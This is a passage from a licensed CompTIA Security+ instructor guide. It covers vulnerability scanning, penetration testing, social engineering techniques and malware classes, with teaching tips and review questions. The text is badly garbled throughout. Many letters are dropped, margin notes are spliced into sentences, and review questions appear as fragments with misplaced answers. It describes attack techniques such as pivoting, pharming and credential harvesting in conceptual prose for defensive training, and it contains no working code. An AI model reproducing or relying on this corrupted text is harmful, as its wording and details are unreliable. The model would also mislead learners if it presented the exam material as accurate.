in compliance with data sharing agreements and non-disclosure agreements.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
56 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Security Concerns with General
Vulnerability Types
Answer the following questions:
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 57
Topic 3C
Summarize Vulnerability
Scanning Techniques
Network reconnaissance and discovery is used to identify hosts, network topology, ho lide s
and open services/ports, establishing an overall attack surface. Various types of
security assessments can be used to test these hosts and services for vulnerabilities.
Security Assessments
There are many models and frameworks for conducting security assessments. A good
starting point is NIST's Technical Guide to Information Security Testing and Assessment Teaching
(nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf). SP 800-115 Tip
identifies three principal activities within an assessment
Relate vulnerability
• Testing the object under assessment to discover vulnerabilities or to prove the scanning to other
e ectiveness of security controls. types of security
assessment. Note
• Examining assessment objects to understand the security system and identify any that most types
of vulnerability
logical weaknesses. This might highlight a lack of security controls or a common assessment can be
misconfiguration. performed using
automated tools.
• Interviewing personnel to gather information and probe attitudes toward and
understanding of security.
The main types of security assessment are usually classed as ulnera ilit
assessment, threat huntin , and penetration testing. A vulnerability assessment is an
evaluation of a system's security and ability to meet compliance requirements based
on the configuration state of the system. ssentially, the vulnerability assessment
determines if the current configuration matches the ideal configuration the baseline .
Vulnerability assessments might involve manual inspection of security controls, but are
more often accomplished through automated vulnerability scanners.
An automated scanner must be configured with signatures and scripts that can Vulnerability Scan
correlate known software and configuration vulnerabilities with data gathered from Types
each host. Consequently, there are several types of vulnerability scanners optimized
for di erent tasks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
58 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Greenbone Open AS vulnerability scanner with Security Assistant web application interface as installed
on ali inux. (Screenshot used with permission from Greenbone etworks, http www.openvas.org.)
The first phase of scanning might be to run a detection scan to discover hosts on a
particular IP subnet. In the next phase of scanning, a target range of hosts is probed
to detect running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, anti virus configuration, and so on.
ach scanner is configured with a database of known software and configuration
vulnerabilities. The tool compiles a report about each vulnerability in its database that
was found to be present on each host. ach identified vulnerability is categori ed and
assigned an impact warning. Most tools also suggest remediation techniques. This
information is highly sensitive, so use of these tools and the distribution of the reports
produced should be restricted to authorized hosts and user accounts.
Network vulnerability scanners are configured with information about known
vulnerabilities and configuration weaknesses for typical network hosts. These scanners
will be able to test common operating systems, desktop applications, and some
server applications. This is useful for general purpose scanning, but some types of
applications might need more rigorous analysis.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 59
An automated scanner needs to be kept up to date with information about known Common
vulnerabilities. This information is often described as a ulnera ilit eed, though the Vulnerabilities and
Nessus tool refers to these feeds as plug-ins, and OpenVAS refers to them as network Exposures
vulnerability tests ( Ts). Often, the vulnerability feed forms an important part of scan
vendors' commercial models, as the latest updates require a valid subscription to
acquire.
The CVE dictionary provides the principal input for NIST's National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric, calculated using the Common ulnera ilit corin
stem C , plus fi information.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
60 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
core escription
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical
Scan intrusiveness is a measure of how much the scanner interacts with the target.
on intrusi e or passi e scannin means analyzing indirect evidence, such as the
types of traffic generated by a device. A passive scanner, the eek Network ecurity
Monitor (zeek.org) being one example, analyzes a network capture and tries to identify
policy deviations or CVE matches. This type of scanning has the least impact on the
network and on hosts, but is less likely to identify vulnerabilities comprehensively.
Passive scanning might be used by a threat actor to scan a network stealthily. You might
use passive scanning as a technique where active scanning poses a serious risk to system
stability, such as scanning print devices, VoIP handsets, or embedded systems networks.
Active scanning means probing the device's configuration using some sort of network
connection with the target. Active scanning consumes more network bandwidth and
runs the risk of crashing the target of the scan or causing some other sort of outage.
Agent-based scanning is also an active technique.
The most intrusive type of vulnerability scanner does not stop at detecting a
vulnerability. Exploitation frameworks contain default scripts to try to use a
vulnerability to run code or otherwise gain access to the system. This type of highly
intrusive testing is more typical of penetration testing than automated vulnerability
scanning.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 61
A non-credentialed scan is one that proceeds by directing test packets at a host Credentialed versus
without being able to log on to the OS or application. The view obtained is the one Non-Credentialed
that the host exposes to an unprivileged user on the network. The test routines may Scanning
be able to include things such as using default passwords for service accounts and
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn't have specific high level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with log-on rights to various hosts,
plus whatever other permissions are appropriate for the testing routines. This
sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured. It also shows what an
insider attack, or one where the attacker has compromised a user account, may
be able to achieve. A credentialed scan is a more intrusive type of scan than
non-credentialed scanning.
Configuring credentials for use in target (scope) definitions in Greenbone Open AS as installed on ali
inux. (Screenshot used with permission from Greenbone etworks, http www.openvas.org.)
Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the
credentials for these accounts are stored securely on the scan server.
ho lide s
A scanning tool will generate a summary report of all vulnerabilities discovered during Teaching
the scan directly after execution completes. These reports color-code vulnerabilities Tip
in terms of their criticality, with red typically denoting a weakness that requires
Students need to
immediate attention. You can usually view vulnerabilities by scope (most critical across know the meanings of
all hosts or by host. The report should include or link to specific details about each false positive and false
vulnerability and how hosts can be remediated. negative.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
62 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Scan report listing multiple high-severity vulnerabilities found in a indows host. (Screenshot
Greenbone Community Edition greenbone.net en community-edition.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 63
As well as matching known software exploits to the versions of software found running Configuration eview
on a network, a vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks. It might
try to identify whether there is a lack of controls that might be considered necessary or
whether there is any misconfiguration of the system that would make the controls less
e ective or ine ective, such as anti virus software not being updated, or management
passwords left configured to the default. enerally speaking, this sort of testing
re uires a credentialed scan. It also re uires specific information about best practices
in configuring the particular application or security control. These are provided by
listing the controls and appropriate configuration settings in a template.
Security content automation protocol (SCAP) allows compatible scanners to determine
whether a computer meets a configuration baseline. CA uses several components to
accomplish this function, but some of the most important are:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema for
describing system security state and querying vulnerability reports and information.
Comparing a local network security policy to a template. The minimum password length set
in the local policy is much less than is recommended in the template.
(Screenshot used with permission from icrosoft.)
ome scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary for
regulatory compliance or you might voluntarily want to conform to externally agreed
standards of best practice.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
64 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Intelli ence usion and threat data—threat hunting can be performed by manual
analysis of network and log data, but this is a very lengthy process. An organization
with a security information and event management (SIEM) and threat analytics
platform can apply intelligence fusion techniques. The analytics platform is kept up
to date with a TT and IoC threat data feed. Analysts can develop ueries and filters
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 65
to correlate threat data against on premises data from network traffic and logs. This
process may also be partially or wholly automated using AI-assisted analysis and
correlation.
• aneu er—when investigating a suspected live threat, you must remember the
adversarial nature of hacking. A capable threat actor is likely to have anticipated
the likelihood of threat hunting, and attempted to deploy countermeasures
to frustrate detection. For example, the attacker may trigger a DDoS attack to
divert the security team's attention, and then attempt to accelerate plans to
achieve actions on objectives. Maneuver is a military doctrine term relating to
obtaining positional advantage (ccdcoe.org/uploads/2012/01/3_3_Applegate_
ThePrincipleOfManeuverInCyberOperations.pdf). As an example of defensive
maneuver, threat hunting might use passive discovery techniques so that threat
actors are given no hint that an intrusion has been discovered before the security
team has a containment, eradication, and recovery plan.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
66 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Vulnerability Scanning Techniques
Answer the following questions:
erify that the vulnerability feed plug in test has been updated with the specific C
that you need to test for.
A fully non intrusive solution should be adopted, such as sniffing traffic using a
network tap or mirror port. sing the network traffic to detect vulnerabilities rather
than actively probing each device will not cause system stability issues (though there is
greater risk of false positive and false negative results).
False positive.
Collecting network traffic and log data from multiple sources and then analy ing
it manually will require many hours of analyst time. The use of threat feeds and
intelligence fusion to automate parts of this analysis e ort would enable a much
swifter response.
5. hat term relates to assessment techni ues that a oid alertin threat
actors
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 67
Topic 3D
Explain Penetration Testing Concepts
A penetration test—often shortened to pen test—uses authorized hacking techniques Penetration Testing
to discover exploitable weaknesses in the target's security systems. Pen testing is also
referred to as ethical hacking. A pen test might involve the following steps: Teaching
Tip
• Verify a threat exists—use surveillance, social engineering, network scanners, and
vulnerability assessment tools to identify a vector by which vulnerabilities that could Make sure students
can distinguish
be exploited.
vulnerability
assessment from pen
• Bypass security controls—look for easy ways to attack the system. For example, if
testing.
the network is strongly protected by a firewall, is it possible to gain physical access
to a computer in the building and run malware from a USB stick?
• Actively test security controls probe controls for configuration weaknesses and
errors, such as weak passwords or software vulnerabilities.
The key di erence from passive vulnerability assessment is that an attempt is made
to actively test security controls and exploit any vulnerabilities discovered. Pen testing
is an intrusive assessment technique. For example, a vulnerability scan may reveal
that an SQL Server has not been patched to safeguard against a known exploit. A
penetration test would attempt to use the exploit to perform code injection and
compromise and "own" (or "pwn" in hacker idiom) the server. This provides active
testing of security controls. Even though the potential for the exploit exists, in practice
the permissions on the server might prevent an attacker from using it. This would not
be identified by a vulnerability scan, but should be proven or not proven to be the case
by penetration testing.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
68 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching than a vague type of "Break into the network" aim. There may be systems and data
Tip that the penetration tester should not attempt to access or exploit. Where a pen test
Make sure students involves third-party services (such as a cloud provider), authorization to conduct the
can distinguish test must also be sought from the third party.
between black box,
white box, and gray The Pentest-Standard website provides invaluable commentary on the conduct of pen tests
box. (pentest-standard.readthedocs.io en latest tree.html).
Attac rofile
Attacks come from di erent sources and motivations. ou may wish to test both
resistance to external (targeted and untargeted) and insider threats. You need to
determine how much information about the network to provide to the consultant:
• lac o (or unknown environment)—the consultant is given no privileged
information about the network and its security systems. This type of test would
require the tester to perform a reconnaissance phase. Black box tests are useful for
simulating the behavior of an external threat.
A test where the attacker has no knowledge of the system but where sta are informed
that a test will take place is referred to as a blind (or single-blind test. A test where sta
are not made aware that a pen test will take place is referred to as a double-blind test.
u ount
ho lide s
A u ount is a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities. Where a pen test is performed on a
Exercise Types contractual basis, costed by the consultant, a bug bounty program is a way of crowd
sourcing detection of vulnerabilities. Some bug bounties are operated as internal
Teaching programs, with rewards for employees only. Most are open to public submissions
Tip (tripwire.com/state-of-security/security-data-protection/cyber-security/essential-bug-
Note that purple is not bounty-programs).
necessarily a separate
team (possibly one
or more facilitators), ercise T pes
but a di erent way
of structuring the Some of the techniques used in penetration testing may also be employed as an
exercise. exercise between two competing teams:
You might want
to note the use of • ed team performs the o ensive role to try to infiltrate the target.
"rainbow" teams
to include DevOps • lue team—performs the defensive role by operating monitoring and alerting
(blackhat.com/docs/ controls to detect and prevent the infiltration.
us-17/wednesday/
us-17-Wright-Orange- There will also often be a white team, which sets the rules of engagement and
Is-The-New-Purple-wp. monitors the exercise, providing arbitration and guidance, if necessary. If the red team
pdf). is third party, the white team will include a representative of the consultancy company.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 69
One critical task of the white team is to halt the exercise should it become too risky. For
example, an actual threat actor may attempt to piggyback a backdoor established by
the red team.
In a red versus blue team exercise, the typical process is for the red team to attempt
the intrusion and either succeed or fail, and then to write a summary report. This
confrontational structure does not always promote constructive development and
improvement. In a purple team exercise, the red and blue teams meet for regular
debriefs while the exercise is ongoing. The red team might reveal where they have been
successful and collaborate with the blue team on working out a detection mechanism.
This process might be assisted by purple team members acting as facilitators. The
drawback of a purple team exercise is that without blind or double-blind conditions,
there is no simulation of a hostile adversary and the stresses of dealing with that.
Analysis of adversary TTPs has established various "kill chain" models of the way Passive and Active
modern cyber-attacks are conducted. A penetration testing engagement will generally Reconnaissance
use the same sort of techniques.
Teaching
In the first reconnaissance phase for black bo testing, the pen tester establishes a
Tip
profile of the target of investigation and surveys the attack surface for weaknesses.
Reconnaissance activities can be classed as passive or active. Passive reconnaissance is Make sure students
understand the
not likely to alert the target of the investigation as it means querying publicly available
terminology and
information. Active reconnaissance has more risk of detection. Active techniques might can distinguish
involve gaining physical access to premises or using scanning tools on the target's web passive from active
services and other networks. techniques.
• Open Source Intelligence (OSINT)—using web search tools, social media, and
sites that scan for vulnerabilities in Internet-connected devices and services
(securitytrails.com/blog/osint-tools) to obtain information about the target. OSINT
aggregation tools, such as theHarvester (github.com/laramies/theHarvester), collect
and organize this data from multiple sources. OSINT requires almost no privileged
access as it relies on finding information that the company makes publicly available,
whether intentionally or not. This is a passive technique.
• ar dri in —mapping the location and type (frequency channel and security
method) of wireless networks operated by the target. Some of these networks may
be accessible from outside the building. imply sniffing the presence of wireless
networks is a passive activity, though there is the risk of being observed by security
guards or cameras. An attacker might be able to position rogue access points, such
as the Hak5 Pineapple (shop.hak .org products wifi pineapple), or perform other
wireless attacks using intelligence gathered from war driving.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
70 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
around premises, with the expectation that at least some of them will be picked up
and used (blackhat.com/docs/us-16/materials/us-16-Bursztein-Does-Dropping-USB-
Drives-In-Parking-Lots-And-Other-Places-Really-Work.pdf .
• Pivoting—hosts that hold the most valuable data are not normally able to access
external networks directly. If the pen tester achieves a foothold on a perimeter
server, a pivot allows them to bypass a network boundary and compromise servers
on an inside network. A pivot is normally accomplished using remote access and
tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or
remote desktop.
• Actions on Objectives—for a threat actor, this means stealing data from one or
more systems data e filtration . rom the perspective of a pen tester, it would be a
matter of the scope definition whether this would be attempted. In most cases, it is
usually sufficient to show that actions on ob ectives could be achieved.
• Cleanup—for a threat actor, this means removing evidence of the attack, or at least
evidence that could implicate the threat actor. For a pen tester, this phase means
removing any backdoors or tools and ensuring that the system is not less secure
than the pre-engagement state.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 71
Review Activity:
Penetration Testing Concepts
Answer the following questions:
1. A e site o ner ants to e aluate hether the site securit miti ates ris s
rom criminal s ndicates assumin no ris o insider threat hat t pe o
penetration testin en a ement ill most closel simulate this ad ersar
capa ilit and resources
In a red versus blue team, there is no contact between the teams, and no opportunity
to collaborate on improving security controls. In a purple team exercise, there is
regular contact and knowledge sharing between the teams throughout the progression
of the exercise.
I s monitor their networks for suspicious traffic and may block the test attempts. The
pen test may also involve equipment owned and operated by the ISP.
Persistence refers to the tester's ability to reconnect to the compromised host and use
it as a remote access tool (RAT) or backdoor.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
72 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 3
Summary
Teaching You should be able to summarize types of security assessments, such as vulnerability,
Tip threat hunting, and penetration testing. You should also be able to explain general
Check that students procedures for conducting these assessments.
are confident about
the content that has
been covered. If there
uidelines or er ormin ecurit Assessments
is time, revisit any
content examples that
Follow these guidelines when you consider the use of security assessments:
they have questions • Identify the procedures and tools that are required to scan the attack surface for
about. If you have
vulnerabilities. This might mean provisioning passive network scanners, active
used all the available
time for this lesson remote or agent-based network scanners, and application or web application
block, note the issues, scanners.
and schedule time for
a review later in the • Develop a configuration and maintenance plan to ensure secure use of any
course. credentialed scans and updates to vulnerability feeds.
Interaction • Run scans regularly and review the results to identify false positives and false
pportunit negatives, using log review and additional CVE information to validate results if
Optionally, discuss necessary.
with students which
security assessments • chedule configuration reviews and remediation plans, using C vulnerability
they have used in their criticality to prioritize actions.
workplaces, or which
could be of most • Consider implementing threat hunting programs, monitoring advisories and
benefit. bulletins for new threat sources. Note that threat hunting might require investment
in resources to supply intelligence fusion and threat data.
• Consider implementing penetration testing exercises, ensuring that these are set
up with clear rules of engagement for red/blue or purple team exercise types and
black/white/gray box disclosure.
• Run penetration tests using a structured kill chain life cycle, with reconnaissance,
exploitation, persistence, privilege escalation, lateral movement/pivoting, actions on
objectives, and cleanup phases.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 4
Identifying Social
Engineering and Malware
Lesson Objectives
In this lesson, you will
• Compare and contrast social engineering techni ues.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
74 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 4A
Compare and Contrast Social
Engineering Techniques
ocial ngineering
• An attacker triggers a fire alarm and then slips into the building during the
rinciples confusion and attaches a monitoring device to a network port.
Interaction
Opportunity Social Engineering Principles
Ask whether any ocial engineering is one of the most common and successful malicious techni ues.
students have
ecause it e ploits basic human trust, social engineering has proven to be a particularly
been sub ected to
social engineering e ective way of manipulating people into performing actions that they might not
attempts and what the otherwise perform. To be persuasive, social engineering attacks rely on one or more of
e perience was like. the following principles.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 75
Familiarity/Liking
ome people have the sort of natural charisma that allows them to persuade others
to do as they re uest. ne of the basic tools of a social engineer is simply to be a able
and likable, and to present the re uests they make as completely reasonable and
unob ectionable. This approach is relatively low risk as even if the re uest is refused,
it is less likely to cause suspicion and the social engineer may be able to move on to a
di erent target without being detected.
Consensus/Social Proof
The principle of consensus or social proof refers to the fact that without an e plicit
instruction to behave in a certain way, many people will act ust as they think others
would act. A social engineering attack can use this instinct either to persuade the
target that to refuse a re uest would be odd That's not something anyone else has
ever said no to or to e ploit polite behavior to slip into a building while someone
holds the door for them. As another e ample, an attacker may be able to fool a user
into believing that a malicious website is actually legitimate by posting numerous fake
reviews and testimonials praising the site. The victim, believing many di erent people
have udged the site acceptable, takes this as evidence of the site's legitimacy and
places their trust in it.
Impersonation simply means pretending to be someone else. It is one of the basic Impersonation and
social engineering techni ues. Impersonation can use either a consensus liking or Trust
intimidating approach. Impersonation is possible where the target cannot verify the
attacker's identity easily, such as over the phone or via an email message.
The classic impersonation attack is for the social engineer to phone into a department,
claim they have to ad ust something on the user's system remotely, and get the user to
reveal their password. This specific attack is also referred to as pretexting.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
76 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Making a convincing impersonation and establishing a trust with the target usually
depends on the attacker obtaining privileged information about the organi ation.
or e ample, where the attacker impersonates a member of the organi ation's IT
support team, the attack will be more e ective with identity details of the person being
impersonated and the target.
ome social engineering techni ues are dedicated to obtaining this type of intelligence
as a reconnaissance activity. As most companies are set up toward customer service
rather than security, this information is typically uite easy to come by. Information
that might seem innocuous such as department employee lists, ob titles, phone
numbers, diaries, invoices, or purchase orders can help an attacker penetrate an
organi ation through impersonation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 77
Identity fraud is a specific type of impersonation where the attacker uses specific Identity raud and
details of someone's identity. A typical consumer identity fraud is using someone else's Invoice cams
name and address to make a loan application or using stolen credit card details to start
a mobile phone contract. Invoice scams are another common type of identity fraud.
The fraudster will usually spoof the invoice details of a genuine supplier, but change
the bank account number. This might rely on the target not double checking the
account, or it might be combined with a social engineering contact call to convince the
target that the account change is genuine.
Sometimes the terms identity fraud and identity theft are used to distinguish between
making up an identity versus stealing someone else s identity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
78 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Example phishing email On the right, you can see the message in its true form as the mail client has
stripped out the formatting (shown on the left) designed to disguise the nature of the links.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 79
could also be perpetrated over any type of instant messaging or Internet messaging
service SPIM .
Hoaxes, such as security alerts or chain emails, are another common social
engineering techni ue, often combined with phishing attacks. An email alert or web
pop up will claim to have identified some sort of security problem, such as virus
infection, and o er a tool to fi the problem. The tool of course will be some sort of
Tro an application. Malvertising e ploits the use of space on legitimate websites set
aside for advertising served from content delivery networks CDNs without much
oversight blog.talosintelligence.com malvertising deepdive.html . Criminals
will also use sophisticated phone call scams to try to trick users into revealing login
credentials or financial account details.
A phishing or hoa email can be made more convincing by prepending. In an o ensive
sense, prepending means adding te t that appears to have been generated by the mail
system. or e ample, an attacker may add to the sub ect line to make it appear
as though the message is a reply or may add something like MAIL A A D to
make it appear as though a message has been scanned and accepted by some security
software. Conversely, some mail systems may perform prepending legitimately,
such as tagging e ternal messages or messages with a warning if they have not been
definitively identified as spam but that do have suspicious elements.
Direct messages to a single contact have uite a high chance of failure. ther social harming and
engineering techni ues still use spoofed resources, such as fake sites and login pages, Credential arvesting
but rely on redirection or passive methods to entrap victims.
Teaching
Pharming Tip
Make sure students
Pharming is a passive means of redirecting users from a legitimate website to a can distinguish
malicious one. ather than using social engineering techni ues to trick the user, phishing and
pharming relies on corrupting the way the victim's computer performs Internet name pharming.
resolution, so that they are redirected from the genuine site to the malicious one. or
e ample, if mybank.foo should point to the I address . . . , a pharming attack would
corrupt the name resolution process to make it point to I address . . . .
Typosquatting
ather than redirection, a threat actor might use typosquatting. This means that
the threat actor registers a domain name that is very similar to a real one, such
as connptia.org, hoping that users will not notice the di erence. These are
also referred to as cousin, lookalike, or doppelganger domains. Typos uatting might
be used for pharming and phishing attacks. Another techni ue is to register a
hi acked subdomain using the primary domain of a trusted cloud provider, such as
onmicrosoft.com. If a phishing message appears to come from comptia.
onmicrosoft.com, many users will be inclined to trust it.
Watering Hole Attack
A watering hole attack is another passive techni ue where the threat actor does not
have to risk communicating directly with the target. It relies on the circumstance that a
group of targets may use an unsecure third party website. or e ample, sta running
an international e commerce site might use a local pi a delivery firm. If an attacker
can compromise the pi a delivery firm's website or deploy a type of malvertising,
they may be able infect the computers of the e commerce company's employees and
penetrate the e commerce company systems.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
80 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Credential Harvesting
ithin the general realm of phishing and pharming, credential harvesting is a
campaign specifically designed to steal account credentials. The attacker may have
more interest in selling the database of captured logins than trying to e ploit them
directly. uch attacks will use an alarming message such as our account is being used
to host child pornography or There is a problem with your account storage and a link
to a pharming site embroidered with the logos of a legitimate service provider, such as
oogle, Microsoft, acebook, or Twitter. Attacks using malvertising or scripts in ected
into shopping cart code are also popular csoonline.com article what is
magecart how this hacker group steals payment card data.html . Targeted credential
harvesting might be directed against a single company's password reset or account
management portal.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 81
Review Activity:
Social Engineering Techniques
Answer the following uestions
1. The help desk takes a call and the caller states that she cannot connect to
the e-commerce website to check her order status. She would also like a
user name and password. The user gives a valid customer company name
but is not listed as a contact in the customer database. The user does not
know the correct company code or customer ID. Is this likely to be a social
engineering attempt, or is it a false alarm?
This is likely to be a social engineering attempt. The help desk should not give out any
information or add an account without confirming the caller's identity.
This is a social engineering attempt utili ing a watering hole attack and or malvertising.
If social engineering, this is spear phishing the attack uses specific detail over a voice
channel vishing . It is possible that it uses deep fake technology for voice mimicry.
The use of a sophisticated attack for a relatively low value data asset seems unlikely,
however. A fairly safe approach would be to contact the C back on a known
mobile number.
4. Your company manages marketing data and private information for many
hi h profile clients ou are hostin an open da or prospecti e emplo ees
With the possibility of social engineering attacks in mind, what precautions
should emplo ees ta e hen the uests are ein sho n around the o ce
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
82 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 4B
Analyze Indicators
of Malware-Based Attacks
ther classifications are based on the payload delivered by the malware. The payload
is an action performed by the malware other than simply replicating or persisting on
a host. amples of payload classifications include spyware, rootkit, remote access
Tro an AT , and ransomware.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 83
A computer virus is a type of malware designed to replicate and spread from computer Computer iruses
to computer, usually by infecting e ecutable applications or program code. There are
several di erent types of viruses and they are generally classified by the di erent types
of file or media that they infect
• Non resident file infector the virus is contained within a host e ecutable file and
runs with the host process. The virus will try to infect other process images on
persistent storage and perform other payload actions. It then passes control back to
the host program.
• Memory resident when the host file is e ecuted, the virus creates a new process
for itself in memory. The malicious process remains in memory, even if the host
process is terminated.
• oot the virus code is written to the disk boot sector or the partition table of a
fi ed disk or media, and e ecutes as a memory resident process when the
starts or the media is attached to the computer.
• cript and macro viruses the malware uses the programming features available
in local scripting engines for the and or browser, such as ower hell, indows
Management Instrumentation MI , Java cript, Microsoft ffice documents with
isual asic for Applications A code enabled, or D documents with Java cript
enabled.
In addition, the term multipartite is used for viruses that use multiple vectors and
polymorphic for viruses that can dynamically change or obfuscate their code to evade
detection.
hat these types of viruses have in common is that they must infect a host file or
media. An infected file can be distributed through any normal means on a disk, on
a network, as an attachment to an email or social media post, or as a download from
a website.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
84 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Unsafe attachment detected by Outlook s mail filter The double file extension is an unsophisticated
attempt to fool any user not already alerted by the use of both English and German in the message
text. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 85
at all, however. The malware may change registry values to achieve persistence
e ecuting if the host computer is restarted . The initial e ecution of the malware
may also depend on the user running a downloaded script, file attachment, or
Tro an software package.
• ileless malware may use live o the land techni ues rather than compiled
e ecutables to evade detection. This means that the malware code uses
legitimate system scripting tools, notably ower hell and indows Management
Instrumentation MI , to e ecute payload actions. If they can be e ecuted with
sufficient permissions, these environments provide all the tools the attacker needs
to perform scanning, reconfigure settings, and e filtrate data.
The terms advanced persistent threat (APT) and advanced volatile threat (A T) can be
used to describe this general class of modern fileless live o the land malware.
Another useful classification is low observable characteristics L C attack mcafee.
com enterprise en us security awareness ransomware what is fileless malware.html .
The e act classification is less important than the reali ation that adversaries can use
any variety of coding tricks to e ect intrusions and that their tactics, techni ues, and
procedures to evade detection are continually evolving.
The first viruses and worms focused on the destructive potential of being able to pyware and
replicate. As the profitable uses this software became apparent, however, they started eyloggers
to be coded with payloads designed to facilitate intrusion, fraud, and data theft.
arious types of unwanted code and malware perform some level of monitoring Teaching
Tip
• Tracking cookies cookies are plain te t files, not malware, but if browser settings
allow third party cookies, they can be used to record pages visited, search ueries, pyware keylogger is
a means of classifying
browser metadata, and I address. Tracking cookies are created by adverts and
malware by its
analytics widgets embedded into many websites. purpose, rather than
vector.
• Adware this is a class of grayware that performs browser reconfigurations,
such as allowing tracking cookies, changing default search providers, opening
sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed
as a program or as a browser e tension plug in.
• Spyware this is malware that can perform adware like tracking, but also monitor
local application activity, take screenshots, and activate recording devices, such as a
microphone or webcam. Another spyware techni ue is perform DN redirection to
pharming sites.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
86 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Actual eylogger is indows software that can run in the background to monitor different kinds of
computer activity (opening and closing programs, browsing websites, recording keystrokes, and
capturing screenshots). (Screenshot used with permission from Actual eylogger.com.)
eyloggers are not only implemented as software. A malicious script can transmit key
presses to a third-party website. There are also hardware devices to capture key presses to
a modified US adapter inserted between the keyboard and the port. Such devices can store
data locally or come with i- i connectivity to send data to a covert access point. Other
attacks include wireless sniffers to record key press data, overlay AT pin pads, and so on.
In this context, AT can also stand for emote Administration Tool. A host that is under
malicious control is sometimes described as a zombie.
A compromised host can be installed with one or more bots. A bot is an automated
script or tool that performs some malicious activity. A group of bots that are all under
